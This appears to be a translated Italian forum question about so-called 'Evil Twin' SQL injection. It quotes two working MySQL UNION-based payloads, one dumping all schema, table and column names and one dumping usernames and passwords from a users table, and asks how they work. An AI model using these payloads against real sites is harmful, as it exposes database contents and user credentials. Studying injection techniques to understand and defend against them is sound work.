Ho letto di SQL injection e sono stato colpito all'iniezione di Evil Twin SQL qui . Ci sono due domande menzionate nell'articolo come segue.
-1' union select 1,2,3,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)#
e
-1' union all select (select (@) from (select(@:=0x00),(select (@) from (users) where (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',username,' ] > ',pass,' > '))))a)#
Capisco che la prima query recupererà tutte le tabelle e le colonne corrispondenti e la seconda query recupererà i dati da una particolare colonna di una tabella. Ma l'articolo in realtà non spiega come funziona la query.
Gran parte della mia ricerca su Google è passata direttamente al cracking di Evil Twin wifi :(